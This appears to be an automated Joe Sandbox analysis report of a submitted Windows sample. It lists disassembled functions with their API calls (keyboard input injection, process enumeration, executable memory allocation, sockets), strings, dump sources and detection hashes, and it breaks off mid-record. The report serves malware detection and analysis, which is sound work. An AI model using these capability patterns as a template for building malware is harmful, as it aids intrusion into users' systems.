API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: e1e6ee028e8cb36817bc0c232c9bc6ea4269155170e90ef978c588218500d065
Instruction ID: 937e147f8c9121703fcf6d9b3eb7d5880d111e2ab46535bc79706eb3cd533869
Opcode Fuzzy Hash: e1e6ee028e8cb36817bc0c232c9bc6ea4269155170e90ef978c588218500d065
Instruction Fuzzy Hash: 26D0C77151172BCFCB208F32D80821273E5AF08351B22C83AD582C2290EE78C880CA90

Function 007B1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 007B1718
__swprintf.LIBCMT ref: 007B1749

Strings

WIN_XPe, xrefs: 007B1788
%.3d, xrefs: 007B1723

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 69b03eab9690cb5a5cc111647211d7c99ebf9d56405b9838d02b97f49f0ab571
Instruction ID: 18b1ab40be97b7255fd077fa7455fbef4dde8859b1822b96988ad3b34280d965
Opcode Fuzzy Hash: 69b03eab9690cb5a5cc111647211d7c99ebf9d56405b9838d02b97f49f0ab571
Instruction Fuzzy Hash: 9AD05B71804118FACB0097919C9DDFD737CBB08301FD404A2F406D3040EA3D8B94D725

Function 007C717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45968ed35f7c8bbee9486a52ef76c1928cbdf3d4be1465ade22cf23c6915e54c
Instruction ID: 79e48312f76228603941af31a70b45a90035c83733ed79e19f518fc61216f192
Opcode Fuzzy Hash: 45968ed35f7c8bbee9486a52ef76c1928cbdf3d4be1465ade22cf23c6915e54c
Instruction Fuzzy Hash: 53C14A75A04256EFCB18CFA4C884EAEBBB5FF48314B14859CE805DB251DB34EE81DB90

Function 007EE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 007EE0BE
CharLowerBuffW.USER32(?,?), ref: 007EE101

Part of subcall function 007ED7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007ED7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007EE301
_memmove.LIBCMT ref: 007EE314

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: c719145087acf05bae96eb67cdaf391c7597d3bebbe65332406cea17506b7794
Instruction ID: 0eec84255cc140a35ad7d9d7d45c4e55954dad16294f47de61c1a7b8c03f3cc8
Opcode Fuzzy Hash: c719145087acf05bae96eb67cdaf391c7597d3bebbe65332406cea17506b7794
Instruction Fuzzy Hash: D7C18871609341CFCB04DF29C484A6ABBE4FF89314F04896EF9998B351D734E946CB82

Function 007E8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 007E80C3
CoUninitialize.OLE32 ref: 007E80CE

Part of subcall function 007CD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007CD5D4

VariantInit.OLEAUT32(?), ref: 007E80D9
VariantClear.OLEAUT32(?), ref: 007E83AA

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 142d80372f1c167574eb01a592ef7199cb8d616f16c785792c74b2ca23803ed2
Instruction ID: e76e5cfcf726c997eba159fc6c671be1466926eeab006b057f9095de5ea5a17b
Opcode Fuzzy Hash: 142d80372f1c167574eb01a592ef7199cb8d616f16c785792c74b2ca23803ed2
Instruction Fuzzy Hash: DFA14575605741DFCB40DF65C885A2EB7E4BF89764F048458FA9A9B3A1CB38EC05CB82

Function 007C7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00802C7C,?), ref: 007C76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00802C7C,?), ref: 007C7702
CLSIDFromProgID.OLE32(?,?,00000000,007FFB80,000000FF,?,00000000,00000800,00000000,?,00802C7C,?), ref: 007C7727
_memcmp.LIBCMT ref: 007C7748

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 7f9e07993be3235de708a94f37678fd4ce554916c0f77f5beebf4cc8acc68b0d
Instruction ID: e6d9e3d66ef5d6e9df5028691054376c2eea05428594a90300906c9724aa37b7
Opcode Fuzzy Hash: 7f9e07993be3235de708a94f37678fd4ce554916c0f77f5beebf4cc8acc68b0d
Instruction Fuzzy Hash: CC81D875A00109EFCB04DFA4C988EEEB7B9FF89315B20459DE505AB250DB75AE06CF60

Function 007C687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007C688E
SysAllocString.OLEAUT32(00000000), ref: 007C6937
VariantCopy.OLEAUT32 ref: 007C6966
VariantClear.OLEAUT32(?), ref: 007C698D

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: c7ec6fb3a7f235f0dd2d5a4997e1b403d2fbd2a1693d7e6c4c53041e939874b2
Instruction ID: 1571c60d09012b8c30c22a9220657336ff055402dd7644a29b5185b759298b9d
Opcode Fuzzy Hash: c7ec6fb3a7f235f0dd2d5a4997e1b403d2fbd2a1693d7e6c4c53041e939874b2
Instruction Fuzzy Hash: 96519C64704701DACF24AF65D8D5F3EB3E5AF44310F20C81FE58AEB292EA38D8808B45

Function 007F97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(010CEDB8,?), ref: 007F9863
ScreenToClient.USER32(00000002,00000002), ref: 007F9896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007F9903

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 3a6e155786aa978c4e0a5b0a22a756faf218339b101051e7f36e16d1b29d0c29
Instruction ID: 4cce42496c14df03f8b4922a44305f6abba4c519e2bc20b88dc37e26742e9b0d
Opcode Fuzzy Hash: 3a6e155786aa978c4e0a5b0a22a756faf218339b101051e7f36e16d1b29d0c29
Instruction Fuzzy Hash: 37512A34A00208EFCF14CF68C884ABE7BA5FF95360F108569FA659B3A0D774AD41CB90

Function 007C9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007C9AD2
__itow.LIBCMT ref: 007C9B03

Part of subcall function 007C9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 007C9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 007C9B6C
__itow.LIBCMT ref: 007C9BC3

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 179d0d00ec8d0b51a97ed9b2ac5ef25663c65d76a89b7aeeb91c7598afe1a5f6
Instruction ID: 323789f26dd66f0d6e8f6dddc3cbf232a1c7a8812ad71a1e164252c37e33f357
Opcode Fuzzy Hash: 179d0d00ec8d0b51a97ed9b2ac5ef25663c65d76a89b7aeeb91c7598afe1a5f6
Instruction Fuzzy Hash: FF416FB0A00208ABDF15DF54D849FEE7BB9EF49750F00405DFA09A6291DB789E44CB61

Function 007E69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 007E69D1
WSAGetLastError.WSOCK32(00000000), ref: 007E69E1

Part of subcall function 00779837: __itow.LIBCMT ref: 00779862
Part of subcall function 00779837: __swprintf.LIBCMT ref: 007798AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007E6A45
WSAGetLastError.WSOCK32(00000000), ref: 007E6A51

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: a44665b824fcba6309479e791e45c914d7eeb1efcbeb5d68d1e2fc5a5e39695e
Instruction ID: 370132dedcdfbb9e4b947390e9070d3d694c0fc5663be53af6809a0fa95055e4
Opcode Fuzzy Hash: a44665b824fcba6309479e791e45c914d7eeb1efcbeb5d68d1e2fc5a5e39695e
Instruction Fuzzy Hash: 00418275740200AFEB60AF24CC8AF3D77E49F19B94F44C468FA5D9B2D2DA789D008752

Function 007E641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,007FF910), ref: 007E64A7
_strlen.LIBCMT ref: 007E64D9

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: e40e9d0611b093ba7445c960b719fdf1e5b2102f1f2ffdec84b8175f8ba206ec
Instruction ID: 6c7bc1d047fae0d2ff214646622d45ea46c17837edf12657f92803941f3250eb
Opcode Fuzzy Hash: e40e9d0611b093ba7445c960b719fdf1e5b2102f1f2ffdec84b8175f8ba206ec
Instruction Fuzzy Hash: 0C41C671A01144EFCF14EBA9ECC9FBEB7A9AF18350F108159F91997296DB38AD10CB50

Function 007DB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007DB89E
GetLastError.KERNEL32(?,00000000), ref: 007DB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007DB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007DB915

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 0ba8f1ebbbead7917aa345ce44b4233b48b5e2d2d037a0c382f224cd8ec7aafa
Instruction ID: f870e576b625e0b81ead210b0897e6235946e65d2105b3e67af619e75ccc8441
Opcode Fuzzy Hash: 0ba8f1ebbbead7917aa345ce44b4233b48b5e2d2d037a0c382f224cd8ec7aafa
Instruction Fuzzy Hash: C541F735601650DFCB10EF15C488A5DBBB1AF4A350B09C099ED4A9B362CB38FD01DB92

Function 007F8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007F88DE

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 772e7c8966253a82420f5af62295e1037f1ef1bdac1c48ada28260342b6eacad
Instruction ID: efebc86eb44aecdf2941e923391aab5c98d7fd70c314a1f9c74693a5c2b07b67
Opcode Fuzzy Hash: 772e7c8966253a82420f5af62295e1037f1ef1bdac1c48ada28260342b6eacad
Instruction Fuzzy Hash: E131903461010CEEEFA0DB68CC45BBD77A5FB05350F944512FB15E63A1CEB8A9809757

Function 007FAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 007FAB60
GetWindowRect.USER32(?,?), ref: 007FABD6
PtInRect.USER32(?,?,007FC014), ref: 007FABE6
MessageBeep.USER32(00000000), ref: 007FAC57

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 88f6d5a76c135dd02eff6911a5d037bda9dfec20ad84dad4f02cd5766bbbd413
Instruction ID: 5b8be7b5da6388d0c559d12dda818494f81d9bb898d329f8f77754a0e44cfee2
Opcode Fuzzy Hash: 88f6d5a76c135dd02eff6911a5d037bda9dfec20ad84dad4f02cd5766bbbd413
Instruction Fuzzy Hash: 04416CB460011DEFCB11DF58D884A797BF5FF89310F1884A9EA199B360D734E941CBA2

Function 007D0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007D0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 007D0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007D0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007D0BFB

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: c7eb9c9c882f9d9746a553ff555785e3809465a74fc6363e73a9ae0138cace45
Instruction ID: 21b2dfbcd6660590f40e25b009ac23832aa3ff16879fdb9da3943bcce4839ed1
Opcode Fuzzy Hash: c7eb9c9c882f9d9746a553ff555785e3809465a74fc6363e73a9ae0138cace45
Instruction Fuzzy Hash: 37314BB0948608AEFB308F258C09BF9BBB5AB45314F04925FE491523D1C77D8950D7E5

Function 007D0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 007D0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 007D0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 007D0CE1
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 007D0D33

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2d6944e82dc9100c2c89461a0939905dc819a593f75672c669fe74f42c8f1a9e
Instruction ID: 55a964b398b24d86c241ad8a33e1e8afe5739a2add471fa646295b2e22c3d30b
Opcode Fuzzy Hash: 2d6944e82dc9100c2c89461a0939905dc819a593f75672c669fe74f42c8f1a9e
Instruction Fuzzy Hash: 4D312630A50618AEFF308A658808BFEBB76AB45310F08931FE489622D1C37D9955D7F5

Function 007A61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007A61FB
__isleadbyte_l.LIBCMT ref: 007A6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A628D

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: b7738d40ed01e6667c76226587c7f866d88b1c5cd20c4ce60dbc399719b675d1
Instruction ID: 5722c1a95082104cb133ca914bea5d91e929a3f5deb32f711b14e24607b0e28f
Opcode Fuzzy Hash: b7738d40ed01e6667c76226587c7f866d88b1c5cd20c4ce60dbc399719b675d1
Instruction Fuzzy Hash: 4631C13160024AEFDF218F64CC48BBA7FA9FF82310F194229E824871D1E738D951DB51

Function 007F4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 007F4F02

Part of subcall function 007D3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007D365B
Part of subcall function 007D3641: GetCurrentThreadId.KERNEL32 ref: 007D3662
Part of subcall function 007D3641: AttachThreadInput.USER32(00000000,?,007D5005), ref: 007D3669

GetCaretPos.USER32(?), ref: 007F4F13
ClientToScreen.USER32(00000000,?), ref: 007F4F4E
GetForegroundWindow.USER32 ref: 007F4F54

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 7f302fcff33497944de4a2c4b614d1903a61d907d47ae24532f7dd51e0dc5b5e
Instruction ID: d6b05ca8561894b0118e3780dc58f328660b01460ef076182005422789d59f4b
Opcode Fuzzy Hash: 7f302fcff33497944de4a2c4b614d1903a61d907d47ae24532f7dd51e0dc5b5e
Instruction Fuzzy Hash: CF311071D00208AFDB00EFA5C889DEFB7F9EF99300F10806AE515E7241DA799E45CBA1

Function 007D3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 007D3C7A
Process32FirstW.KERNEL32(00000000,?), ref: 007D3C88
Process32NextW.KERNEL32(00000000,?), ref: 007D3CA8
CloseHandle.KERNEL32(00000000), ref: 007D3D52

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f25b4501771fe682e795238042e4de442d4a8046ea90a96a289505f75d14eea2
